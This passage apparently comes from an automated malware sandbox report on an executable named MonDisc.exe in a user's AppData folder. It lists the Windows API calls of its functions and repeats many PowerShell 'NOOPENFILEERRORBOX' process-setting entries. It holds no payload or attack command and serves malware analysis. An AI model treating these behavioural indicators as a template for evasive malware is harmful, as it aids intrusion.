Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F516F GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F516F
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F5191 GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F5191
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F517B GetMessageTime,GetUserDefaultLangID,GetSystemDefaultLangID,GetParent,GetDoubleClickTime,GetDoubleClickTime,GetWindowTextLengthW,GetMessageExtraInfo,IsIconic,IsIconic,GetDoubleClickTime,GetLastActivePopup,GetMessageTime,GetModuleHandleW,GetCurrentProcessId,GetShellWindow,GetTopWindow,GetMessageExtraInfo,GetParent,GetTopWindow,GetTopWindow,GetParent,GetLastActivePopup,IsIconic,GetTopWindow,GetMessageExtraInfo,GetMessageExtraInfo,GetCurrentProcessId,GetShellWindow,GetUserDefaultLangID,GetShellWindow,AnyPopup,GetCommandLineW,GetSystemDefaultLangID,GetMessageTime,GetSystemDefaultLangID,GetMessageExtraInfo,GetTickCount,GetTickCount,GetCurrentProcessId,GetTickCount,IsIconic,GetCommandLineW,GetDesktopWindow,IsZoomed,GetDoubleClickTime,IsIconic,GetModuleHandleW,22_2_00007FF62C8F517B
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F82C7 GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F82C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F82C7 GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F82C7
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F832A AnyPopup,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F832A
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F832A AnyPopup,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F832A
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F825C GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F825C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F825C GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F825C
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F82A9 GetParent,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F82A9
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F82A9 GetParent,GetTopWindow,IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F82A9
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F834D IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F834D
Source: C:\Users\user\AppData\Roaming\MonDisc.exeCode function: 22_2_00007FF62C8F834D IsIconic,GetMessageTime,GetLastActivePopup,GetDesktopWindow,GetTopWindow,GetCurrentProcess,AnyPopup,GetLargePageMinimum,GetMessageTime,GetCurrentProcessId,GetTopWindow,GetModuleHandleW,GetMessageExtraInfo,GetTopWindow,GetCurrentProcessId,GetTickCount,GetCurrentProcess,GetLastActivePopup,GetLastActivePopup,GetParent,GetDesktopWindow,GetUserDefaultLangID,GetForegroundWindow,GetForegroundWindow,GetLargePageMinimum,GetMessageExtraInfo,GetLargePageMinimum,GetParent,IsIconic,GetMessageExtraInfo,GetWindowTextLengthW,AnyPopup,GetWindowTextLengthW,GetUserDefaultLangID,22_2_00007FF62C8F834D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
